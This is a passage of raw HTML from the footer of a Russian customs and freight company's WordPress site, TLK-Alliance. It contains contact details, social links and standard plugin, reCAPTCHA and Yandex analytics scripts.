href="/blog/"><span>Блог</span></a></li> <li><a href="/about-company"><span>О компании</span></a></li> </ul> </div></div> </div></div> <div> <div class="el-item uk-panel uk-margin-remove-first-child"> <div class="el-content uk-panel uk-margin-top"><div class="foot-menu_adr"> <div class="foot-contacts_col">Москва, Каширское шоссе, д. 3, к. 2, ст. 4</div> <div class="foot-contacts_email"><strong>Telegram, WhatsApp, Viber:</strong><br><a href="tel:+7(962)919-90-54">+7 (962) 919-90-54</a></div> </div></div> </div></div> <div> <div class="el-item uk-panel uk-margin-remove-first-child"> <div class="el-content uk-panel uk-margin-top"><div class="foot-soc"> <div class="foot-soc_col"> <div class="foot-soc__phone"><a href="tel:74953637086">+7 (495) 363-70-86</a><br></div> <div class="foot-soc__phone"><small><a href="mailto:info@2ved.ru">info@2ved.ru</a></small><br></div> </div> <noindex> <div class="foot-soc_col"> <div class="footer-icon"> <a class="foot-icon" rel="nofollow" href="https://www.facebook.com/2vedru/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-facebook.png"></a> <a class="foot-icon" rel="nofollow" href="https://vk.com/club205116636" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-vk.png"></a> <a class="foot-icon" rel="nofollow" href="http://instagram.com/2ved.ru/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-insta.png"></a> <a class="foot-icon" rel="nofollow" href="https://t.me/tlc_alliance/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-tg.png"></a> <a class="foot-icon" rel="nofollow" href="https://api.whatsapp.com/send?phone=89629199054"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-watsapp.png"></a> <a class="foot-icon"rel="nofollow" href="https://twitter.com/2vedru" target="_blank"><img alt="" src="/wp-content/uploads/2021/09/138-1388876_2017-intertech-americas-corp-white-twitter-bird-transparent-e1632914231236.png"></a></span></a> </div> </div> </noindex> </div></div> </div></div> </div> </div> <div class="uk-panel uk-margin" id="footer-copy"><div class="footer-desc"> <p>ООО «ТЛК-Альянс» – таможенное оформление, сертификация и доставка грузов.</p> <span class="footer-sitemap"> <a href="/sitemap"><i class="fa fa-sitemap"></i></a> <a href="/privacy" class="menufoot__link "><ins></ins>Политика конфиденциальности</a> </span> </div></div> </div> </div> </div> <div id="footer-mobile" class="uk-section-default uk-section uk-section-xsmall"> <div class="uk-container"> <div class="tm-grid-expand uk-child-width-1-1 uk-grid-margin" uk-grid> <div> <div><div class="foot-soc"> <div class="foot-soc_col"> <div class="foot-soc__phone"><a href="tel:74953637086">+7 (495) 363-70-86</a><br></div> <div class="foot-soc__phone"><small><a href="mailto:info@2ved.ru">info@2ved.ru</a></small><br></div> </div> <noindex> <div class="foot-soc_col"> <div class="footer-icon"> <a class="foot-icon" rel="nofollow" href="https://www.facebook.com/2vedru/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-facebook.png"></a> <a class="foot-icon" rel="nofollow" href="https://vk.com/club205116636" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-vk.png"></a> <a class="foot-icon" rel="nofollow" href="http://instagram.com/2ved.ru/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-insta.png"></a> <a class="foot-icon" rel="nofollow" href="https://t.me/tlc_alliance/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-tg.png"></a> <a class="foot-icon" rel="nofollow" href="https://api.whatsapp.com/send?phone=79629199054"><img alt="" src="/wp-content/uploads/2021/06/foot-icon-watsapp.png"></a> <a class="foot-icon"rel="nofollow" href="https://twitter.com/2vedru" target="_blank"><img alt="" src="/wp-content/uploads/2021/09/138-1388876_2017-intertech-americas-corp-white-twitter-bird-transparent-e1632914231236.png"></a></span> </div> </div> </noindex> </div> <div class="foot-menu_adr"> <div class="foot-contacts_col">Москва, Каширское шоссе, д. 3, к. 2, ст. 4, ДК Сириус Парк</div> <div class="foot-contacts_email"><strong>Telegram, WhatsApp, Viber:</strong><br><a href="tel:+7(962)919-90-54">+7 (962) 919-90-54</a></div> </div> <div class="footer-desc"> <p>ООО «ТЛК-Альянс» – таможенное оформление, сертификация и доставка грузов.<br><a href="https://di-project.studio/poddergka-saita.html">Поддержка сайта</a></p> </div></div> </div> </div> </div> </div> </div> <script>var pseudo_links = document.querySelectorAll(".pseudo-clearfy-link");for (var i=0;i<pseudo_links.length;i++ ) { pseudo_links[i].addEventListener("click", function(e){   window.open( e.target.getAttribute("data-uri") ); }); }</script> <div id="wpfront-scroll-top-container"> <i class="fa fa-chevron-up"></i> </div> <style type="text/css"> #wpfront-scroll-top-container i { color: #ffffff; } </style> <script type="text/javascript">
            function wpfront_scroll_top_init() {
                if (typeof wpfront_scroll_top === "function" && typeof jQuery !== "undefined") {
                    wpfront_scroll_top({"scroll_offset":100,"button_width":0,"button_height":0,"button_opacity":0.8,"button_fade_duration":200,"scroll_duration":400,"location":1,"marginX":20,"marginY":20,"hide_iframe":false,"auto_hide":false,"auto_hide_after":2,"button_action":"top","button_action_element_selector":"","button_action_container_selector":"html, body","button_action_element_offset":0});
                } else {
                    setTimeout(wpfront_scroll_top_init, 100);
                }
            }
            wpfront_scroll_top_init();
        </script> <script type='text/javascript' src='https://2ved.ru/wp-includes/js/dist/vendor/regenerator-runtime.min.js' id='regenerator-runtime-js'></script> <script type='text/javascript' src='https://2ved.ru/wp-includes/js/dist/vendor/wp-polyfill.min.js' id='wp-polyfill-js'></script> <script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/2ved.ru\/wp-json\/","namespace":"contact-form-7\/v1"}};
/* ]]> */
</script> <script type='text/javascript' src='https://2ved.ru/wp-content/plugins/contact-form-7/includes/js/index.js' id='contact-form-7-js'></script> <script type='text/javascript' id='expert-review-scripts-js-extra'>
/* <![CDATA[ */
var expert_review_ajax = {"url":"https:\/\/2ved.ru\/wp-admin\/admin-ajax.php","nonce":"eb1624684f","comment_to_scroll_selector":null,"ask_question_link_new_tab":null,"i18n":{"question_popup_name":"\u0418\u043c\u044f","question_popup_email":"Email","question_popup_phone":"\u0422\u0435\u043b\u0435\u0444\u043e\u043d","question_popup_question":"\u0412\u043e\u043f\u0440\u043e\u0441","question_popup_submit":"\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c","question_popup_cancel":"\u041e\u0442\u043c\u0435\u043d\u0430","question_submitted":"\u0412\u043e\u043f\u0440\u043e\u0441 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d","legacy_form":"\u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u043a\u043e\u0434 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u0444\u043e\u0440\u043c\u044b","field_cannot_be_empty":"\u041f\u043e\u043b\u0435 \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0443\u0441\u0442\u044b\u043c","field_must_be_checked":"\u041f\u043e\u043b\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u043e","consent":"\u0421\u043e\u0433\u043b\u0430\u0441\u0438\u0435 \u043d\u0430 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445"},"consent":null};
/* ]]> */
</script> <script type='text/javascript' src='https://2ved.ru/wp-content/plugins/expert-review/assets/public/js/scripts.min.js' id='expert-review-scripts-js'></script> <script type='text/javascript' src='https://2ved.ru/wp-content/plugins/wpfront-scroll-top/js/wpfront-scroll-top.min.js' id='wpfront-scroll-top-js'></script> <script type='text/javascript' src='https://2ved.ru/wp-content/plugins/cf7-phone-mask-field/assets/js/jquery.maskedinput.js' id='wpcf7mf-mask-js'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6LcaJfwcAAAAAFtn-SSMeKkRLb6vwZcLegEcwkwh' id='google-recaptcha-js'></script> <script type='text/javascript' id='wpcf7-recaptcha-js-extra'>
/* <![CDATA[ */
var wpcf7_recaptcha = {"sitekey":"6LcaJfwcAAAAAFtn-SSMeKkRLb6vwZcLegEcwkwh","actions":{"homepage":"homepage","contactform":"contactform"}};
/* ]]> */
</script> <script type='text/javascript' src='https://2ved.ru/wp-content/plugins/contact-form-7/modules/recaptcha/index.js' id='wpcf7-recaptcha-js'></script> <script type="text/javascript">
					jQuery.noConflict();
					(
						function ( $ ) {
							$( function () {
								$( "area[href*=\\#],a[href*=\\#]:not([href=\\#]):not([href^='\\#tab']):not([href^='\\#quicktab']):not([href^='\\#pane'])" ).click( function () {
									if ( location.pathname.replace( /^\//, '' ) == this.pathname.replace( /^\//, '' ) && location.hostname == this.hostname ) {
										var target = $( this.hash );
										target = target.length ? target : $( '[name=' + this.hash.slice( 1 ) + ']' );
										if ( target.length ) {
											$( 'html,body' ).animate( {
												scrollTop: target.offset().top - 20											},900 , 'easeInOutQuint' );
											return false;
										}
									}
								} );
							} );
						}
					)( jQuery );
				</script> <script>!function(){var t=!1;try{var e=Object.defineProperty({},"passive",{get:function(){t=!0}});window.addEventListener("test",null,e)}catch(t){}return t}()||function(i){var o=!0,s=!1;EventTarget.prototype.addEventListener=function(t,e,n){var r="object"==typeof n,a=r?n.capture:n;n=r?n:{},"touchstart"!=t&&"scroll"!=t&&"wheel"!=t||(n.passive=void 0!==n.passive?n.passive:o),n.capture=void 0!==a?a:s,i.call(this,t,e,n)}}(EventTarget.prototype.addEventListener);</script> <div id="modal-thank-you" class="uk-flex-top modal-all" uk-modal> <div class="uk-modal-dialog uk-modal-body uk-margin-auto-vertical"> <button class="uk-modal-close-default" type="button" uk-close></button> <div class="uk-h2">Спасибо, Ваше сообщение отправлено!</div> </div> <script>
        document.addEventListener( 'wpcf7mailsent', function( event ) {
           UIkit.modal(".modal-all").hide();
           UIkit.modal("#modal-thank-you").show();
        }, false );
    </script> <script>
        jQuery('.agree').prop('checked', false);
    </script> </div> <!-- Yandex.Metrika counter --> <script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(80254375, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        webvisor:true
   });
</script> <noscript><div><img src="https://mc.yandex.ru/watch/80254375" style="position:absolute; left:-9999px;" alt=""/></div></noscript> <!-- /Yandex.Metrika counter --> </body> </html> 